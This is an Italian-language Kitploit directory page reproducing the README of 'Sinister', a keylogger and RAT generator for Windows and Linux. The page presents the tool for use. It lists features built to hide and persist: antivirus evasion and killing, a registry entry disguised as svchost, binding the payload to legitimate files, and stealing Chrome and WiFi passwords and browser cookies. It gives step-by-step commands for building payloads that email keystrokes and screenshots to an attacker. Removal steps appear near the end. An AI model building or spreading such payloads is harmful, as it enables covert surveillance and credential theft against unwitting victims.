Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Sinister — Sinister è un generatore di keylogger per Windows/Linux che invia i tasti premuti via email insieme ad altre interessanti informazioni sul target. | Kitploit
Strumenti/GitHubGitHub/pushpenderindia/sinister
Password CrackingGenerazione di PayloadMeccanismi di PersistenzaEsfiltrazione DatiRaccolta InformazioniPost-ExploitRed TeamingStrumento di Accesso Remoto
GitHubpushpenderindia/sinister

Sinister

Sinister è un generatore di keylogger per Windows/Linux che invia i tasti premuti via email insieme ad altre interessanti informazioni sul target.

Vedi Repository
465931 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Sinister Logo

Sinister

Hacker GIF

root@kitploit:~
                    Questo piccolo script Python può fare un lavoro davvero eccezionale.

Sinister è un generatore di Keylogger per Windows/Linux, che invia key-log e screenshot tramite email insieme ad altre preziose informazioni sul bersaglio, scritto in Python 3.

Disclaimer

:computer: Questo progetto è stato creato solo per scopi positivi e uso personale.

QUESTO SOFTWARE VIENE FORNITO "COSÌ COM'È" SENZA ALCUNA GARANZIA. PUOI UTILIZZARLO A TUO RISCHIO. L'UTILIZZO È SOTTO LA COMPLETA RESPONSABILITÀ DELL'UTENTE FINALE. GLI SVILUPPATORI NON SI ASSUMONO ALCUNA RESPONSABILITÀ E NON SONO RESPONSABILI PER QUALSIASI USO IMPROPRIO O DANNO CAUSATO DA QUESTO PROGRAMMA.

Caratteristiche

  • Funziona su Windows/Linux
  • Notifica della nuova vittima tramite email
  • Non rilevabile
  • Persistenza
  • Validazione delle credenziali email prima della generazione del payload.
  • Può ricevere keylog da qualsiasi provider email come GMAIL, YAHOO, OUTLOOK, SMTP personalizzato.
  • Server/Porta SMTP
Nome ServerServer SMTPPorta SMTP
GMAILsmtp.gmail.com587
OUTLOOKsmtp-mail.outlook.com587
YAHOOsmtp.mail.yahoo.com587
  • Invia screenshot dello schermo del PC della vittima tramite email
  • Crea un eseguibile binario con zero dipendenze
  • Crea payload di dimensioni ridotte (~5 MB) con funzionalità avanzate
  • Offusca il payload prima di generarlo, bypassando così alcuni antivirus
  • Il payload generato è codificato in base64, rendendo estremamente difficile il reverse engineering
  • Funzione per uccidere l'antivirus sul PC della vittima e tentare di disabilitare la sicurezza
  • Interfaccia grafica colorata per generare il payload
  • Lato Attaccante: durante la creazione del payload, lo script rileva automaticamente le dipendenze mancanti e le installa
  • Distingue i dati di log in base al nome della finestra attiva (Controlla l'immagine per una migliore comprensione)
  • Possibilità di aggiungere un'icona personalizzata al file malevolo
  • Binder integrato che può associare il keylogger a qualsiasi file [.pdf, .txt, .exe ecc.], eseguendo il file legittimo in primo piano e i codici malevoli in background come servizio.
  • Controlla la presenza di un' sul sistema; se trovata, viene eseguito solo il file legittimo [ per evitare di ricevere log email duplicati].
Cosa può rubare lo Stealer integrato :
Chrome (Password salvate)
WiFi (Password salvate)
Cookie di Chrome (Login Data, Cookie, Cronologia)
Cookie di Firefox (cookies.sqlite)

Nota: Lo Stealer personalizzato è codificato, non si basa su LaZagne

  • Recupera e invia informazioni utili sul dispositivo della vittima
Queste informazioni sono recuperate e inviate:
Sistema Operativo
Nome del Computer
Nome Utente
IPv4 Pubblico
  • Se il payload non riesce a eseguirsi, usa --debug per eseguire l'exe in primo piano con CMD

Importante

Il 30 maggio 2022, Google ha rimosso la funzionalità delle app meno sicure, quindi invece della password di Gmail:

  • Attiva la 2FA sulla tua Gmail attaccante
  • Crea una password specifica per l'app
  • Usa quella password specifica per l'app durante la creazione del payload.
  • Come creare una password specifica per l'app: Clicca qui

Testato su

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Prerequisiti

  • Python 3.X
  • Alcuni moduli esterni

Come usare su Linux

root@kitploit:~
# Naviga nella directory /opt (opzionale)
$ cd /opt/

# Clona questo repository
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Vai nella cartella Sinister
$ cd Sinister

# Installa le dipendenze
$ bash installer_linux.sh

*** Nota: Quando appare la finestra di dialogo dell'installer Python durante l'esecuzione di installer_linux.sh ***
    * Clicca su installazione personalizzata
    * Seleziona Percorso : C:/Python37-32
    ### In questo modo Python verrà installato in questo percorso (all'interno di Wine) : ~/.wine/drive_c/Python37-32

# Se ricevi errori durante l'esecuzione di installer_linux.sh, prova installare con installer_linux.py
$ python3 installer_linux.py

$ chmod +x Sinister.py
$ python3 Sinister.py --help

# Creazione del payload/RAT
$ python3 Sinister.py -e [email protected] -p PasswordEmail -l -o nome_file_output --icon percorso_icona

# Creazione del payload utilizzando server SMTP GMAIL, configurazione porta (Default SMTP Server = smtp.gmail.com, Default SMTP Port = 587)
$ python3 Sinister.py -e [email protected] -p PasswordEmail -l -o nome_file_output --icon percorso_icona

# Creazione del payload utilizzando server SMTP OUTLOOK, configurazione porta
$ python3 Sinister.py -e [email protected] -p PasswordEmail -x smtp-mail.outlook.com -y 587 -l -o nome_file_output --icon percorso_icona

# Creazione del payload utilizzando server SMTP YAHOO, configurazione porta
$ python3 Sinister.py -e [email protected] -p PasswordEmail -x smtp.mail.yahoo.com -y 587 -l -o nome_file_output --icon percorso_icona

Nota: Puoi anche usare le nostre icone personalizzate dalla cartella icon, usale così  --icon icon/pdf.ico

Come usare su Windows

root@kitploit:~
# Installa le dipendenze
$ Installa l'ultima versione di Python 3.x

# Clona questo repository
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Entra nel repository
$ cd Sinister

# Installa le dipendenze
$ python -m pip install -r requirements.txt

# Apri Sinister.py in un editor di testo e configura la riga 16 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe"

# Menu di aiuto
$ python Sinister.py --help

# Creazione del payload/RAT
$ python Sinister.py -e [email protected] -p PasswordEmail -w -o nome_file_output --icon percorso_icona

# Creazione del payload utilizzando server SMTP GMAIL, configurazione porta (Default SMTP Server = smtp.gmail.com, Default SMTP Port = 587)
$ python Sinister.py -e [email protected] -p PasswordEmail-w -o nome_file_output --icon percorso_icona

# Creazione del payload utilizzando server SMTP OUTLOOK, configurazione porta
$ python Sinister.py -e [email protected] -p PasswordEmail -x smtp-mail.outlook.com -y 587 -w -o nome_file_output --icon percorso_icona

# Creazione del payload utilizzando server SMTP YAHOO, configurazione porta
$ python Sinister.py -e [email protected] -p PasswordEmail -x smtp.mail.yahoo.com -y 587 -w -o nome_file_output --icon percorso_icona

Nota: Puoi anche usare le nostre icone personalizzate dalla cartella icon, usale così  --icon icon/pdf.ico

Come aggiornare

  • Esegui updater.py per aggiornare automaticamente o scarica l'ultimo Zip da questo repository GitHub
  • Nota: Git deve essere installato per usare updater.py

Nota:- Il file malevolo verrà salvato nella cartella dist/, all'interno della cartella Sinister/

Argomenti disponibili

  • Argomenti opzionali

Nota : -w/--windows o -l/--linux deve essere specificato

  • Argomenti obbligatori

Nuovi Screenshot:

Ottenere aiuto

Generazione del payload

Ricezione del report

I dati di log sono distinti in base al nome della finestra attiva ~ Funzionalità aggiunta dalla v1.3 in poi

Recupera e invia le password salvate del browser Chrome

  • Nota: Per usare questa funzionalità, specifica -s o --steal-password durante la creazione del keylogger

Recupera e invia le password salvate del Wi-Fi

  • Nota: Per usare questa funzionalità, specifica -s o --steal-password durante la creazione del keylogger

Vedi anche queste vecchie immagini

~Vecchi Screenshot:

Ottenere aiuto

Esecuzione dello script Sinister.py

Build completato

Quando il keylogger viene eseguito, aggiunge una voce nel registro per diventare persistente

Crea una copia di se stesso e la salva in Roaming

Digitazione di testo casuale per testare il keylogger

Report 1 inviato da Sinister

Login su facebook ~ Vittima

Report 2 - Keylog delle credenziali di Facebook

Report 3 - Con screenshot

Debug dei problemi

Prova a eseguire il Keylogger Offline per testare la cattura dei keylog offline e debug del keylogger eseguendo questi comandi:

Esegui test_key.py in entrambe le modalità [Compilato & Raw] e scopri qual è l'errore

Eseguilo così: python test_key.py

Compilalo anche così: pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard

Dopo l'esecuzione, inizia a digitare qualcosa, Il risultato verrà visualizzato nel prompt dei comandi ogni 10 secondi

I file del keylogger offline sono presenti nella cartella TestKeylogger

  • Se il payload non riesce a eseguirsi sul sistema della vittima
root@kitploit:~
1. Crea un nuovo payload con il flag --debug
2. Esegui l'exe del payload tramite cmd [Non eseguire il payload facendo doppio clic]
3. Ora mostrerà un errore più appropriato in CMD, segnalalo nella sezione Issue

Rimozione di Sinister in Windows:

Metodo 1:

  • Vai su Start, digita regedit ed esegui il primo programma, questo aprirà l'editor del registro.
  • Naviga al seguente percorso Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Dovrebbe esserci una voce chiamata svchost, fai clic destro su di essa e seleziona Elimina.
  • Vai al tuo percorso utente > AppData > Roaming, vedrai un file chiamato "svchost.exe", questo è il RAT, fai clic destro > Elimina.
  • Riavvia il sistema.

Metodo 2:

  • Esegui "RemoveSinister.bat" nel sistema infetto e poi riavvia il PC per fermare l'attuale file malevolo in esecuzione.

Rimozione di Sinister in Linux:

  • Apri il file Autostart con un editor di testo, Percorso file Autostart: ~/.config/autostart/xinput.desktop

  • Rimuovi queste 5 righe:

    root@kitploit:~
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="nome_file_destinazione"
    
  • Nota: nome_file_destinazione è il nome del file malevolo che hai dato al tuo Keylogger usando il parametro -o

  • Riavvia il sistema e poi elimina il file malevolo salvato nel percorso qui sotto

  • Percorso di destinazione, dove è salvato il Keylogger : ~/.config/xnput

Contributori

  • Elenco dei contributori dedicati: Contributori

Contributi di qualsiasi tipo sono benvenuti!

NOTA: Se dovresti essere nella lista dei contributori ma ti abbiamo dimenticato, faccelo sapere!

TODO

  • Suggerisci la tua funzionalità
  • Aggiungi nuove funzionalità
  • Contribuisci alla versione GUI
Scarica lo strumento
istanza già in esecuzione
Proibitore di istanze multiple
  • L'attaccante può creare/compilare per Windows/Linux utilizzando Linux, ma può creare/compilare solo eseguibili Windows usando una macchina Windows
  • Recupera le password salvate dal sistema della vittima e le invia all'attaccante.
  • AbbreviazioneCompletoDescrizione
    -h--helpmostra questo messaggio di aiuto ed esci
    -i INTERVAL--interval INTERVALTempo tra i report in secondi. default=120
    -t TIME_PERSISTENT--persistence TIME_PERSISTENTDiventa persistente dopo __ secondi. default=10
    -x SMTP_Server--smtpServer SMTP personalizzato . default="smtp.gmail.com"
    -y SMTP_Port--portPorta SMTP personalizzata . default=587
    -w--windowsGenera un eseguibile Windows.
    -l--linuxGenera un eseguibile Linux.
    -s--steal-passwordRuba le password salvate dalla macchina vittima [OS Supportato : Windows]
    -b file.txt--bind PERCORSO_FILE_LEGITTIMO.pdfAutoBinder : Specifica il percorso del file legittimo. [OS Supportato : Windows]
    -d--debugIl payload verrà eseguito in primo piano con finestra CMD, per ottenere l'errore di esecuzione appropriato
    AbbreviazioneCompletoDescrizione
    --icon ICONSpecifica il percorso dell'icona, icona del file malevolo [Nota : Deve essere .ico]
    -e EMAIL--email EMAILIndirizzo email a cui inviare i report.
    -p PASSWORD--password PASSWORDPassword per l'indirizzo email specificato nell'argomento -e.
    -o OUT--out OUTNome del file di output.

    Pushpender Singh

    :computer:

    Thomas Kunwar

    :computer:

    krasnova19

    :computer:

    sarchish5

    :computer:

    chiragcode11

    :computer:

    C4RR0T02

    :computer: